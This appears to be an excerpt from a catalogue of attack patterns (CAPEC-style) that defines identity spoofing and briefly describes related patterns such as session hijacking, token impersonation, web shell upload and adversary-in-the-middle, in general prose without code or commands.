Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials.
CAPEC-194: Fake the Source of Data
An adversary takes advantage of improper authentication to provide data or services under a falsified identity. The purpose of using the falsified identity may be to prevent traceability of the provided data or to assume the rights granted to another individual. One of the simplest forms of this attack would be the creation of an email message with a modified "From" field in order to appear that the message was sent from someone other than the actual sender. The root of the attack (in this case the email system) fails to properly authenticate the source and this results in the reader incorrectly performing the instructed action. Results of the attack vary depending on the details of the attack, but common results include privilege escalation, obfuscation of other attacks, and data corruption/manipulation.
CAPEC-22: Exploiting Trust in Client
An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
CAPEC-57: Utilizing REST's Trust in the System Resource to Obtain Sensitive Data
This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to obtain sensitive data once SSL is terminated.
CAPEC-593: Session Hijacking
This type of attack involves an adversary that exploits weaknesses in an application's use of sessions in performing authentication. The adversary is able to steal or manipulate an active session and use it to gain unathorized access to the application.
CAPEC-633: Token Impersonation
An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.
CAPEC-650: Upload a Web Shell to a Web Server
By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a "gateway" to the underlying web server. The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.
CAPEC-94: Adversary in the Middle (AiTM)
An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components.